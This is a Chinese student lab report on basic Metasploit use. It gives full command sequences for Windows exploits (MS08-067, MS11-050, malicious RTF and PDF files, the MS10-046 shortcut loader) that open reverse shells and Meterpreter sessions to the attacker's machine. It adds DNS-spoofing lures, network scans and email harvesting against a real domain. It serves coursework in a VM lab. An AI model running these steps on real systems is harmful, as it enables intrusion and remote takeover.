标签:shel shellcode 条件 s/4 就是 常用 rtc 时间 没有
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
一个主动攻击实践,如ms08-067; (1分)
一个针对浏览器的攻击,如ms11-050;(1分)
一个针对客户端的攻击,如Adobe;(1分)
成功应用任何一个辅助模块。(0.5分)
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
Exploit
模块
Payload
模块
Encoder
模块
payload
进行编码,可以通过多种编码手段、多次编码方式有效的改变payload
代码特征payload
作用,但能对payload
进行加工Aux
模块
Post
模块
search name
:用指定关键字搜索可以利用的漏洞模块use exploit name
:使用漏洞show options
:显示配置选项set option name option
:设置选项show payloads
:回链攻击载荷show targets
显示目标(os版本)set TARGET target number
(设置目标版本)exploit
(开始漏洞攻击)sessions -l
(列出会话)sessions -i id
(选择会话)sessions -k id
(结束会话)Ctrl+z
(把会话放到后台)Ctrl+c
(结束会话)show auxiliary
(显示辅助模块)use auxiliary name
(使用辅助模块)set option name option
(设置选项)exploit
(运行模块)exploit
,payload
,encode
。
exploit
:测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。payload
:攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的功能。encode
:encode
编码一是为了避免使攻击载荷不能完整运行的“坏字符”,二是为了改变特征码,帮助攻击载荷避免被杀软发现。①攻击机:kali ②靶机:windows XP SP3(English)
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
//tcp反向回连set LHOST 192.168.130.130
//攻击机ipset LPORT 5303
//攻击端口set RHOST 192.168.130.133
//靶机ip,特定漏洞端口已经固定set target 0
//自动选择目标系统类型,匹配度较高exploit
//攻击建立会话,攻击成功结果如下:
①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
use windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
//http反向回连set LHOST 192.168.130.130
//攻击机ipset LPORT 5303
//攻击端口固定set URIPATH 2015dwj
//统一资源标识符路径设置exploit
在浏览器输入http://192.168.130.130:8080/2015dwj
,IE出现弹窗,警告遇到问题需关闭程序:
此时攻击机正在尝试建立会话,但靶机已经禁止访问了该网页。失败。
第二次在IE中访问特定URI,这次回车刚一敲下去,连界面都还没有弹出来,又被kill了:
严肃地思考:是不是浏览器或者靶机系统的问题?看看哪些系统或软件会存在这个漏洞吧:
于是尝试了winXP/win7和IE7.0/IE8.0的四种排列组合,费尽周折配置好了四种环境,可是还是失败了。
去网上搜各种『ie已经为了帮助保护您的计算机而关闭此网页-百度经验』、『使用ie8 提示Internet Explorer 已经为了帮助保护您的计算机而关闭此网页,怎么解决』、『Win7系统下IE浏览器提示“IE为了保护计算机而关闭网页”的问题分析及解决方法』等等等等解决方案,根据前人的经验教训总结出了:应该修改Internet的安全设置!
在IE浏览器打开“工具->Internet选项”,选择“安全”选项卡,将设置里面最不安全的全部选上,自定义也设置为最低等级——“中”:
除此之外,选择“高级”选项卡,选中“允许运行或安装软件,即使签名无效”:
总之,想尽一切方法降低IE浏览器的警惕性,让它老老实实地中我们的圈套!
可是还是失败了..且原因至今未知(?_?)
①攻击机:kali ②靶机:windowsXP Professional sp2 ③Office版本:2003
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
//运行一个可执行文件set CMD calc.exe
//绑定计算机程序,进行启动exploit
//攻击使用show options
命令查看一些参数值,比如文件名、绑定程序等等。此时文件名为默认,也可以进行修改。
将生成的文件从/root/.msf4/local/msf.rft
拷贝到靶机上,并使用Office2003打开。不管第几次打开,都会提示错误:
双击运行的同时,由于绑定到计算器,因此打开了计算器程序,攻击成功:
①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
//tcp反向回连set LHOST 192.168.130.130
//攻击机ipset LPORT 5303
//攻击端口set FILENAME 20155303-2.pdf
//设置生成pdf文件的名字exploit
//攻击生成的pdf如下图所示:
将生成的pdf文件拷贝到靶机上。
在kali上输入back退出当前模块,进入监听模块,输入以下命令:
use exploit/multi/handler
//进入监听模块set payload windows/meterpreter/reverse_tcp
//tcp反向连接set LHOST 192.168.130.130
//攻击机ipset LPORT 5303
//攻击端口固定exploit
在靶机上打开20155303-2.pdf
文件:
攻击机显示攻击成功:
此时若关闭pdf文件,则失去权限,攻击失败:
①攻击机:kali ②靶机:windowsXP Professional sp2
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.130.130
//攻击机ipset payload windows/meterpreter/reverse_tcp
//tcp反向回连set LHOST 192.168.130.130
//攻击机ipexploit
//攻击这样一来,靶机只要在浏览器访问192.168.130.130:80
,就中了攻击者的圈套:
点击“允许”,会弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:
此时攻击机正在悄悄地连接靶机,试图建立会话:
靶机双击快捷方式,攻击机方显示成功建立会话。使用sessions -i 1
选择会话:
尝试输入shell
命令,攻击成功:
如果靶机关闭网页,攻击机认可控制并攻击靶机:
一点小小的思考:让靶机输入攻击机的IP地址还是有很大的局限性。如果能将DNS欺骗与之相结合,那攻击就会更加主动。在这里可以用
ettercap
,修改etter.dns
配置文件为*.cn A 192.168.130.130
。这样一来,只要受害者访问*.cn域名的时候,就会强行被欺骗成192.168.130.130:80
,从而就更加容易达到攻击者的目的啦~
use auxiliary/scanner/portscan/syn
(使用portscan模块)show options
set RHOSTS 192.168.130.130
(目标)set THREADS 50
(线程)exploit
use auxiliary/scanner/ssh/ssh_version
(使用ssh_version模块)show options
(查看选项)set RHOSTS 10.107.100.0/24
(目标网段)set THREADS 50
(线程)exploit
(开始)use auxiliary/scanner/telnet/telnet_version
(使用telnet_version模块)show options
(查看选项)set RHOSTS
10.180.100.0/24(目标网段)set THREADS 50
(线程)exploit
(开始)use auxiliary/gather/search_email_collector
(使用search_email_collector模块)show options
(查看选项)set DOMAIN baidu.com
(扫描目标)exploit
(开始)use auxiliary/scanner/discovery/arp_sweep
(使用discovery/arp_sweep模块)show options
(查看选项)set RHOSTS 10.180.100.0/24
(目标网段)set THREADS 50
(线程)exploit
(开始)以下为对所在局域网进行扫描后的结果:
2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
标签:shel shellcode 条件 s/4 就是 常用 rtc 时间 没有
原文地址:https://www.cnblogs.com/Vivian517/p/8870658.html